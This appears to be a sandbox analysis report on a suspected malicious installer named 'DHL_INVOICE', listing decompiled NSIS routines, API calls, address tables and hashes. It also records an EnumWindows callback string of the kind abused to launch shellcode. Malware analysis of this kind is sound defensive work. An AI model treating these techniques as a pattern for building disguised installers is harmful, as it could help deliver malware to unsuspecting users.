                                                                            0x004060b4
                                                                            0x004060b4
                                                                            0x0040608c
                                                                            0x00406093
                                                                            0x00406093
                                                                            0x0040608a
                                                                            0x004060c9
                                                                            0x004060ca
                                                                            0x004060d2
                                                                            0x004060d4
                                                                            0x00000000
                                                                            0x004060d4
                                                                            0x00405f93
                                                                            0x00405f94
                                                                            0x00405f97
                                                                            0x00405f99
                                                                            0x00405fd9
                                                                            0x00405fdc
                                                                            0x00405fec
                                                                            0x00405fef
                                                                            0x00405fff
                                                                            0x00405fff
                                                                            0x00406004
                                                                            0x00406005
                                                                            0x00406007
                                                                            0x0040601e
                                                                            0x0040601e
                                                                            0x00406022
                                                                            0x00406023
                                                                            0x00406027
                                                                            0x0040602d
                                                                            0x00406032
                                                                            0x00406034
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040603b
                                                                            0x00406047
                                                                            0x0040604d
                                                                            0x0040604f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040604f
                                                                            0x00406018
                                                                            0x0040601a
                                                                            0x0040601c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406051
                                                                            0x00406053
                                                                            0x00406056
                                                                            0x00406056
                                                                            0x0040605a
                                                                            0x0040605a
                                                                            0x00000000
                                                                            0x0040605a
                                                                            0x00405ff7
                                                                            0x00000000
                                                                            0x00405ff7
                                                                            0x00405fe4
                                                                            0x00000000
                                                                            0x00405f9b
                                                                            0x00405fb9
                                                                            0x00405fc3
                                                                            0x00405fc7
                                                                            0x00405fcd
                                                                            0x00405fce
                                                                            0x00405fcf
                                                                            0x00405fcf
                                                                            0x0040605e
                                                                            0x00406063
                                                                            0x00406070
                                                                            0x00406070
                                                                            0x00406077
                                                                            0x0040607c
                                                                            0x00000000
                                                                            0x0040607c
                                                                            0x00405f99
                                                                            0x004060fe
                                                                            0x00000000
                                                                            0x00406102

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FE4
                                                                              • Part of subcall function 00406B1A: lstrcpynW.KERNEL32(?,?,00000400,00403871,00434A00,NSIS Error), ref: 00406B27
                                                                              • Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DB2
                                                                              • Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
                                                                              • Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DC6
                                                                              • Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DDE
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,?,?,?,?,00000000,?,?), ref: 00405FF7
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
                                                                            • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,?,?,?,?,00000000,?,?), ref: 004060CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                            • API String ID: 4187626192-3921002329
                                                                            • Opcode ID: 311af7c87eb71035c8d5b2a7baacc15b69a4590f910f25a3f4acb13c9fbad21a
                                                                            • Instruction ID: 8c51b57b95ad5d2f56c6428f73255cfba4eda90222275d8884e674a65d57f274
                                                                            • Opcode Fuzzy Hash: 311af7c87eb71035c8d5b2a7baacc15b69a4590f910f25a3f4acb13c9fbad21a
                                                                            • Instruction Fuzzy Hash: 05611471240216ABDB20AF248C40A7B76A5EF99314F12453FF942FB2D1D77CD9218B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 983 405d3a-405d46 984 405e17-405e1b 983->984 985 405d4c-405d5f 983->985 986 405d61-405d66 call 405eba 985->986 987 405d6b-405d7b lstrlenW 985->987 986->987 989 405da0 987->989 990 405d7d-405d8c lstrlenW 987->990 993 405da5-405da8 989->993 991 405d92-405d9e lstrcatW 990->991 992 405e14-405e16 990->992 991->993 992->984 994 405db7-405dba 993->994 995 405daa-405db1 SetWindowTextW 993->995 996 405e02-405e04 994->996 997 405dbc-405e00 SendMessageW * 3 994->997 995->994 996->992 998 405e06-405e0c 996->998 997->996 998->992
                                                                            C-Code - Quality: 93%
                                                                            			E00405D3A(signed int _a4, WCHAR* _a8) {
                                                                            				WCHAR* _v40;
                                                                            				long _v52;
                                                                            				int _v56;
                                                                            				void* _v60;
                                                                            				void* _t18;
                                                                            				signed int _t19;
                                                                            				long _t20;
                                                                            				signed char _t29;
                                                                            				signed int _t35;
                                                                            				WCHAR* _t39;
                                                                            				WCHAR* _t40;
                                                                            				struct HWND__* _t43;
                                                                            
                                                                            				_t43 =  *0x4349e8;
                                                                            				if(_t43 == 0) {
                                                                            					return _t18;
                                                                            				}
                                                                            				_t29 =  *0x435af4;
                                                                            				_t35 = _t29 & 0x00000001;
                                                                            				if(_t35 == 0) {
                                                                            					_push(_a4);
                                                                            					_push(0x42ed78);
                                                                            					E00405EBA();
                                                                            				}
                                                                            				_t19 = lstrlenW(0x42ed78);
                                                                            				_t39 = _a8;
                                                                            				_a4 = _t19;
                                                                            				if(_t39 == 0) {
                                                                            					_t40 = 0x42ed78;
                                                                            					goto L7;
                                                                            				} else {
                                                                            					_t19 = lstrlenW(_t39) + _a4;
                                                                            					if(_t19 >= 0x1000) {
                                                                            						L13:
                                                                            						return _t19;
                                                                            					}
                                                                            					_t40 = 0x42ed78;
                                                                            					_t19 = lstrcatW(0x42ed78, _t39);
                                                                            					L7:
                                                                            					if((_t29 & 0x00000004) == 0) {
                                                                            						_t19 = SetWindowTextW( *0x4349c8, _t40); // executed
                                                                            					}
                                                                            					if((_t29 & 0x00000002) == 0) {
                                                                            						_v40 = _t40;
                                                                            						_v60 = 1;
                                                                            						_t20 = SendMessageW(_t43, 0x1004, 0, 0); // executed
                                                                            						_v52 = 0;
                                                                            						_v56 = _t20 - _t35;
                                                                            						SendMessageW(_t43, 0x104d - _t35, 0,  &_v60); // executed
                                                                            						_t19 = SendMessageW(_t43, 0x1013, _v56, 0); // executed
                                                                            					}
                                                                            					if(_t35 != 0) {
                                                                            						_t19 = _a4;
                                                                            						0x42ed78[_t19] = 0;
                                                                            					}
                                                                            					goto L13;
                                                                            				}
                                                                            			}















                                                                            0x00405d3e
                                                                            0x00405d46
                                                                            0x00405e1b
                                                                            0x00405e1b
                                                                            0x00405d4d
                                                                            0x00405d5c
                                                                            0x00405d5f
                                                                            0x00405d61
                                                                            0x00405d65
                                                                            0x00405d66
                                                                            0x00405d66
                                                                            0x00405d6c
                                                                            0x00405d71
                                                                            0x00405d75
                                                                            0x00405d7b
                                                                            0x00405da0
                                                                            0x00000000
                                                                            0x00405d7d
                                                                            0x00405d83
                                                                            0x00405d8c
                                                                            0x00405e14
                                                                            0x00000000
                                                                            0x00405e16
                                                                            0x00405d93
                                                                            0x00405d99
                                                                            0x00405da5
                                                                            0x00405da8
                                                                            0x00405db1
                                                                            0x00405db1
                                                                            0x00405dba
                                                                            0x00405dbe
                                                                            0x00405dd0
                                                                            0x00405dd8
                                                                            0x00405ddc
                                                                            0x00405de0
                                                                            0x00405df3
                                                                            0x00405e00
                                                                            0x00405e00
                                                                            0x00405e04
                                                                            0x00405e06
                                                                            0x00405e0c
                                                                            0x00405e0c
                                                                            0x00000000
                                                                            0x00405e04

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
                                                                            • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?), ref: 00405D99
                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll), ref: 00405DB1
                                                                            • SendMessageW.USER32(?), ref: 00405DD8
                                                                            • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                                                            • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                                                              • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll
                                                                            • API String ID: 1759915248-2404675294
                                                                            • Opcode ID: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
                                                                            • Instruction ID: 65e3057419f119a88936ccc655a9da3a15af0d16a1f773064a71e2051a7db8da
                                                                            • Opcode Fuzzy Hash: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
                                                                            • Instruction Fuzzy Hash: D121C2B2A056206BD310AB59DC44AABBBDCEF94710F45043FB984A3291C7B89D404AED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 999 403148-403181 1000 403190-4031a4 call 406948 999->1000 1001 403183-40318b call 403131 999->1001 1005 403379 1000->1005 1006 4031aa-4031b0 1000->1006 1001->1000 1007 40337b 1005->1007 1008 4031b6-403202 GetTickCount 1006->1008 1009 40331b-40331d 1006->1009 1010 40337c-403386 1007->1010 1013 403313-403315 1008->1013 1014 403208-40321f call 40311b 1008->1014 1011 403362-403377 call 40311b 1009->1011 1012 40331f-403321 1009->1012 1011->1005 1011->1013 1012->1013 1015 403323 1012->1015 1013->1010 1014->1005 1022 403225-403233 1014->1022 1018 403328-403338 call 40311b 1015->1018 1018->1005 1025 40333a-403343 call 406a0b 1018->1025 1024 40323d-403259 call 40728e 1022->1024 1030 403317-403319 1024->1030 1031 40325f-40327f GetTickCount 1024->1031 1029 403348-40334a 1025->1029 1034 40334c-40335a 1029->1034 1035 40335e-403360 1029->1035 1030->1007 1032 403281-40328a 1031->1032 1033 4032cc-4032d2 1031->1033 1036 403290-4032c8 MulDiv wsprintfW call 405d3a 1032->1036 1037 40328c-40328e 1032->1037 1038 4032d4-4032d6 1033->1038 1039 40330b-40330d 1033->1039 1034->1018 1040 40335c 1034->1040 1035->1007 1036->1033 1037->1033 1037->1036 1042 4032f0-4032f8 1038->1042 1043 4032d8-4032e1 call 406a0b 1038->1043 1039->1013 1039->1014 1040->1013 1046 4032fc-403303 1042->1046 1047 4032e6-4032e8 1043->1047 1046->1024 1048 403309 1046->1048 1047->1035 1049 4032ea-4032ee 1047->1049 1048->1013 1049->1046
                                                                            C-Code - Quality: 94%
                                                                            			E00403148(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                            				char _v124;
                                                                            				short _v132;
                                                                            				intOrPtr _v136;
                                                                            				signed int _v140;
                                                                            				int _v144;
                                                                            				intOrPtr _v148;
                                                                            				long _v152;
                                                                            				signed int _v156;
                                                                            				signed int _v160;
                                                                            				void* _t39;
                                                                            				void* _t40;
                                                                            				signed int _t41;
                                                                            				void* _t45;
                                                                            				long _t47;
                                                                            				signed int _t50;
                                                                            				intOrPtr _t52;
                                                                            				intOrPtr _t53;
                                                                            				long _t55;
                                                                            				long _t56;
                                                                            				void* _t57;
                                                                            				intOrPtr _t71;
                                                                            				signed int _t73;
                                                                            				intOrPtr _t74;
                                                                            				void* _t76;
                                                                            				signed int _t77;
                                                                            				intOrPtr _t81;
                                                                            				int _t82;
                                                                            				signed int* _t83;
                                                                            
                                                                            				_t83 =  &_v156;
                                                                            				_t72 = _a4;
                                                                            				_t74 = _a12;
                                                                            				_t71 =  !=  ? _a16 : 0x8000;
                                                                            				_t77 = 0;
                                                                            				_t37 =  !=  ? _t74 : 0x423538;
                                                                            				_v144 =  !=  ? _t74 : 0x423538;
                                                                            				if(_a4 >= 0) {
                                                                            					E00403131( *0x435a58 + _t72);
                                                                            				}
                                                                            				_t39 = E00406948(_t72,  *0x40b010,  &_v156, 4); // executed
                                                                            				if(_t39 == 0) {
                                                                            					L31:
                                                                            					_push(0xfffffffd);
                                                                            					goto L32;
                                                                            				} else {
                                                                            					_t41 = _v156;
                                                                            					if(_t41 >= 0) {
                                                                            						if(_t74 != 0) {
                                                                            							_t77 =  <  ? _t41 : _a16;
                                                                            							if(E0040311B(_t74, _t77) != 0) {
                                                                            								L20:
                                                                            								return _t77;
                                                                            							}
                                                                            							goto L31;
                                                                            						}
                                                                            						if(_t41 <= 0) {
                                                                            							goto L20;
                                                                            						}
                                                                            						while(1) {
                                                                            							_t76 =  <  ? _t41 : _t71;
                                                                            							if(E0040311B(0x41f538, _t76) == 0) {
                                                                            								goto L31;
                                                                            							}
                                                                            							_t45 = E00406A0B(_t72, _a8, 0x41f538, _t76); // executed
                                                                            							if(_t45 == 0) {
                                                                            								L29:
                                                                            								_push(0xfffffffe);
                                                                            								L32:
                                                                            								_pop(_t40);
                                                                            								return _t40;
                                                                            							}
                                                                            							_t77 = _t77 + _t76;
                                                                            							_t41 = _v156 - _t76;
                                                                            							_v156 = _t41;
                                                                            							if(_t41 > 0) {
                                                                            								continue;
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						goto L31;
                                                                            					}
                                                                            					_t47 = GetTickCount();
                                                                            					 *0x40dea4 =  *0x40dea4 & _t77;
                                                                            					 *0x40dea0 =  *0x40dea0 & _t77;
                                                                            					_v152 = _t47;
                                                                            					 *0x417530 = 0x40f528;
                                                                            					 *0x41752c = 0x40f528;
                                                                            					_t50 = _v156 & 0x7fffffff;
                                                                            					 *0x40d988 = 8;
                                                                            					_t73 = _t50;
                                                                            					 *0x417528 = 0x417528;
                                                                            					_v140 = _t50;
                                                                            					_v156 = _t73;
                                                                            					if(_t50 <= 0) {
                                                                            						goto L20;
                                                                            					} else {
                                                                            						goto L5;
                                                                            					}
                                                                            					while(1) {
                                                                            						L5:
                                                                            						_t81 =  <  ? _t73 : 0x4000;
                                                                            						if(E0040311B(0x41f538, 0x4000) == 0) {
                                                                            							goto L31;
                                                                            						}
                                                                            						_v156 = _v156 - 0x4000;
                                                                            						 *0x40d97c = _t81;
                                                                            						_t82 = _v144;
                                                                            						 *0x40d978 = 0x41f538;
                                                                            						while(1) {
                                                                            							_push(0x40d978);
                                                                            							 *0x40d980 = _t82;
                                                                            							 *0x40d984 = _t71;
                                                                            							_t52 = E0040728E();
                                                                            							_v136 = _t52;
                                                                            							if(_t52 < 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t53 =  *0x40d980; // 0x423538
                                                                            							_v152 = _t53 - _t82;
                                                                            							_t55 = GetTickCount();
                                                                            							_t73 = _v160;
                                                                            							_v140 = _t55;
                                                                            							if(( *0x435af4 & 0x00000001) != 0 && (_t55 - _v156 > 0xc8 || _t73 == 0)) {
                                                                            								wsprintfW( &_v132, L"... %d%%", MulDiv(_v144 - _t73, 0x64, _v144));
                                                                            								_t83 =  &(_t83[3]);
                                                                            								E00405D3A(0,  &_v124);
                                                                            								_t73 = _v160;
                                                                            								_v156 = _v140;
                                                                            							}
                                                                            							_t56 = _v152;
                                                                            							if(_t56 == 0) {
                                                                            								if(_t73 > 0) {
                                                                            									goto L5;
                                                                            								}
                                                                            								goto L20;
                                                                            							} else {
                                                                            								if(_t74 != 0) {
                                                                            									_t82 =  *0x40d980; // 0x423538
                                                                            									_t71 = _t71 - _t56;
                                                                            									_v148 = _t82;
                                                                            									L17:
                                                                            									_t77 = _t77 + _t56;
                                                                            									if(_v136 != 1) {
                                                                            										continue;
                                                                            									}
                                                                            									goto L20;
                                                                            								}
                                                                            								_t57 = E00406A0B(_t73, _a4, _t82, _t56); // executed
                                                                            								if(_t57 == 0) {
                                                                            									goto L29;
                                                                            								}
                                                                            								_t56 = _v152;
                                                                            								goto L17;
                                                                            							}
                                                                            						}
                                                                            						_push(0xfffffffc);
                                                                            						goto L32;
                                                                            					}
                                                                            					goto L31;
                                                                            				}
                                                                            			}































                                                                            0x00403148
                                                                            0x0040314e
                                                                            0x0040315e
                                                                            0x0040316c
                                                                            0x00403174
                                                                            0x00403178
                                                                            0x0040317b
                                                                            0x00403181
                                                                            0x0040318b
                                                                            0x0040318b
                                                                            0x0040319d
                                                                            0x004031a4
                                                                            0x00403379
                                                                            0x00403379
                                                                            0x00000000
                                                                            0x004031aa
                                                                            0x004031aa
                                                                            0x004031b0
                                                                            0x0040331d
                                                                            0x0040336b
                                                                            0x00403377
                                                                            0x00403313
                                                                            0x00000000
                                                                            0x00403313
                                                                            0x00000000
                                                                            0x00403377
                                                                            0x00403321
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403328
                                                                            0x0040332c
                                                                            0x00403338
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403343
                                                                            0x0040334a
                                                                            0x0040335e
                                                                            0x0040335e
                                                                            0x0040337b
                                                                            0x0040337b
                                                                            0x00000000
                                                                            0x0040337b
                                                                            0x00403350
                                                                            0x00403352
                                                                            0x00403354
                                                                            0x0040335a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040335c
                                                                            0x00000000
                                                                            0x00403328
                                                                            0x004031b6
                                                                            0x004031bc
                                                                            0x004031c2
                                                                            0x004031c8
                                                                            0x004031d1
                                                                            0x004031d6
                                                                            0x004031df
                                                                            0x004031e4
                                                                            0x004031ee
                                                                            0x004031f0
                                                                            0x004031fa
                                                                            0x004031fe
                                                                            0x00403202
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403208
                                                                            0x00403208
                                                                            0x0040320f
                                                                            0x0040321f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403225
                                                                            0x00403229
                                                                            0x0040322f
                                                                            0x00403233
                                                                            0x0040323d
                                                                            0x0040323d
                                                                            0x00403242
                                                                            0x00403248
                                                                            0x0040324e
                                                                            0x00403253
                                                                            0x00403259
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040325f
                                                                            0x00403266
                                                                            0x0040326a
                                                                            0x00403277
                                                                            0x0040327b
                                                                            0x0040327f
                                                                            0x004032ab
                                                                            0x004032b1
                                                                            0x004032bb
                                                                            0x004032c4
                                                                            0x004032c8
                                                                            0x004032c8
                                                                            0x004032cc
                                                                            0x004032d2
                                                                            0x0040330d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004032d4
                                                                            0x004032d6
                                                                            0x004032f0
                                                                            0x004032f6
                                                                            0x004032f8
                                                                            0x004032fc
                                                                            0x004032fc
                                                                            0x00403303
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403309
                                                                            0x004032e1
                                                                            0x004032e8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004032ea
                                                                            0x00000000
                                                                            0x004032ea
                                                                            0x004032d2
                                                                            0x00403317
                                                                            0x00000000
                                                                            0x00403317
                                                                            0x00000000
                                                                            0x00403208

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004031B6
                                                                            • GetTickCount.KERNEL32 ref: 0040326A
                                                                            • MulDiv.KERNEL32(?,00000064,?), ref: 0040329A
                                                                            • wsprintfW.USER32 ref: 004032AB
                                                                              • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$FilePointerwsprintf
                                                                            • String ID: ... %d%%$85B$85B
                                                                            • API String ID: 999035486-2772677642
                                                                            • Opcode ID: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
                                                                            • Instruction ID: e2bf7c2ae867e5e0c149cd35682d72f4c4d2633ef795981e2bf4a0daba4be17b
                                                                            • Opcode Fuzzy Hash: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
                                                                            • Instruction Fuzzy Hash: 355180716083019BD710DF69DD84A2BBBE8AB84756F10493FFC54E7291DB38DE088B5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1050 40619e-4061be GetSystemDirectoryW 1051 4061c0-4061c2 1050->1051 1052 4061d8 1050->1052 1051->1052 1054 4061c4-4061cf 1051->1054 1053 4061da 1052->1053 1055 4061df-40620c wsprintfW LoadLibraryExW 1053->1055 1054->1053 1056 4061d1-4061d6 1054->1056 1056->1055
                                                                            C-Code - Quality: 100%
                                                                            			E0040619E(intOrPtr _a4) {
                                                                            				short _v576;
                                                                            				int _t8;
                                                                            				void* _t9;
                                                                            				struct HINSTANCE__* _t13;
                                                                            				void* _t14;
                                                                            				void* _t19;
                                                                            
                                                                            				_t8 = GetSystemDirectoryW( &_v576, 0x104);
                                                                            				if(_t8 > 0x104 || _t8 == 0) {
                                                                            					_t9 = 0;
                                                                            					goto L5;
                                                                            				} else {
                                                                            					_t9 = _t8 + _t8;
                                                                            					if( *((short*)(_t19 + _t9 - 0x23e)) == 0x5c) {
                                                                            						L5:
                                                                            						_t14 = 0x4092b2;
                                                                            					} else {
                                                                            						_t14 = 0x4092b0;
                                                                            					}
                                                                            				}
                                                                            				wsprintfW(_t9 +  &_v576, L"%s%S.dll", _t14, _a4);
                                                                            				_t13 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                            				return _t13;
                                                                            			}









                                                                            0x004061b5
                                                                            0x004061be
                                                                            0x004061d8
                                                                            0x00000000
                                                                            0x004061c4
                                                                            0x004061c4
                                                                            0x004061cf
                                                                            0x004061da
                                                                            0x004061da
                                                                            0x004061d1
                                                                            0x004061d1
                                                                            0x004061d1
                                                                            0x004061cf
                                                                            0x004061f1
                                                                            0x00406205
                                                                            0x0040620c

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
                                                                            • wsprintfW.USER32 ref: 004061F1
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406205
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
                                                                            • Instruction ID: 46fd840fe6511d7ccc003e1cb9660209246fe71c7ecdf6ea51a48f4d7cc48468
